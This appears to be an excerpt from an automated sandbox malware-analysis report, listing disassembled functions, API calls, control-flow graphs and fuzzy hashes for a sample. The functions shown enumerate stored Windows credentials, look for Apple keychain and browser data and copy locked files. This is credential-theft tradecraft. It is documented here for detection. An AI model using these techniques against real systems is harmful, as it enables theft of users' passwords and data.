                                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                            • API String ID: 912665193-1740548384
                                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                            • memcpy.MSVCRT ref: 0040B60D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                            • String ID: BIN
                                                                                            • API String ID: 1668488027-1015027815
                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                              • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 2947809556-0
                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 1690352074-0
                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3558857096-0
                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                            • memset.MSVCRT ref: 00445725
                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                              • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                            • memset.MSVCRT ref: 00445755
                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                            • memset.MSVCRT ref: 00445986
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                            • API String ID: 2745753283-3798722523
                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                            • API String ID: 2744995895-28296030
                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                            • memcmp.MSVCRT ref: 0040B9BF
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                            • memcpy.MSVCRT ref: 0040BB66
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                            • String ID: chp$v10
                                                                                            • API String ID: 170802307-2783969131
                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                            • memset.MSVCRT ref: 0040E380
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                            • wcschr.MSVCRT ref: 0040E3B8
                                                                                            • memcpy.MSVCRT ref: 0040E3EC
                                                                                            • memcpy.MSVCRT ref: 0040E407
                                                                                            • memcpy.MSVCRT ref: 0040E422
                                                                                            • memcpy.MSVCRT ref: 0040E43D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                            • API String ID: 3073804840-2252543386
                                                                                            • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                            • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                            • String ID:
                                                                                            • API String ID: 3715365532-3916222277
                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                            • String ID: bhv
                                                                                            • API String ID: 327780389-2689659898
                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
